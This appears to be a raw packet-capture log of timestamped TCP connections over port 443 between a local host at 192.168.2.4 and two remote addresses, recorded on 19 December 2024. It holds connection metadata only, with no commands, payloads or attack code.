                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.985841036 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.985851049 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.985886097 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.990154982 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.990212917 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.999453068 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.999512911 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.020092964 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.020118952 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.020185947 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.020262957 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.020298958 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.020497084 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.023436069 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.023494959 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.023509026 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.029278040 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.029294014 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.029355049 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.029370070 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.035001040 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.035015106 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.035069942 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.035085917 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.041009903 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.041024923 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.041088104 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.041100979 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.046880960 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.046895027 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.046950102 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.046966076 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.046999931 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.053211927 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.053225994 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.053288937 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.053302050 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.058294058 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.058309078 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.058370113 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.058384895 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.064416885 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.064433098 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.064507961 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.064521074 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.109988928 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.119637966 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.119745970 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.124685049 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.124747038 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.127995014 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.128072023 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.134769917 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.134861946 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.138096094 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.138169050 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.144651890 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.144728899 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.151129961 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.151213884 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.157814980 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.157921076 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.161051035 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.161138058 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.167546988 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.167637110 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.170937061 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.171046972 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.177757978 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.177846909 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.184020996 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.184102058 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.190598965 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.190660954 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.194009066 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.194086075 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.200452089 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.200540066 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.207019091 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.207088947 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.210392952 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.210457087 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.215670109 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.215696096 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.215795040 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.215857983 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.216466904 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.216883898 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.216945887 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.220288992 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.220350981 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.221662998 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.221683025 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.221745014 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.221760988 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.221851110 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.226783037 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.226859093 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.227166891 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.227185965 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.227245092 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.227258921 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.227876902 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233288050 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233304024 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233311892 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233361006 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233376026 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233388901 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.233422995 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.238946915 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.238964081 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.239026070 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.239039898 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.239108086 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.239914894 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.239983082 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.245201111 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.245220900 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.245279074 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.245301008 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.245326042 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.245979071 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.251153946 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.251171112 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.251233101 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.251245975 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.251797915 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.256593943 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.256613016 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.256679058 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.256701946 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.257179022 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.313170910 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.313426018 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.318130970 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.318219900 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.323452950 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.323519945 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.326215982 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.326280117 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.331423998 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.331489086 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.336615086 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.336690903 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.338888884 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.338949919 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.343648911 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.343715906 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.348263979 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.348340988 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359682083 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359699965 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359723091 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359770060 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359805107 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359822989 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.359854937 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.372863054 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.372916937 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.372966051 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.372993946 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.373163939 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.387063980 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.387099981 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.387190104 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.387217045 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.387353897 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.402204990 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.402239084 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.402298927 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.402327061 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.402339935 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.408154011 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.408183098 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.408252001 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.408293962 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.409080029 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.413527012 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.413543940 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.413615942 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.413636923 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.413834095 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.415694952 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.415729046 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.415770054 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.415781975 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.415795088 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.419698000 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.419722080 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.419780016 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.419794083 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.420526981 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.425672054 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.425687075 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.425756931 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.425770044 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.425837994 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.431394100 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.431408882 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.431499958 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.431514025 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.432218075 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.437596083 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.437613964 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.437671900 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.437686920 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.437844038 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.443043947 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.443069935 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.443130970 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.443142891 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.443898916 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.450381994 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.450406075 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.450475931 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.450488091 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.451143980 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.456608057 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.504960060 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.504995108 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.505167007 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.505167007 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.505192995 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.505718946 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.514276028 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.514302969 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.514377117 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.514400959 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.514480114 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.524475098 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.524502993 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.524594069 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.524622917 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.524760962 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.534147978 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.534209013 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.534255981 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.534280062 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.534411907 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.534411907 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539520025 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539565086 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539599895 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539614916 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539627075 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539726019 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539774895 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539844990 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.539860964 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.562820911 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.566183090 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.566230059 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.567732096 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.567840099 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.568193913 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.568315983 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.568332911 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.600231886 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.600255966 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.600307941 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.600328922 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.600358009 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.600383043 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.605643034 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.605663061 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.605735064 CET49751443192.168.2.4104.16.102.112
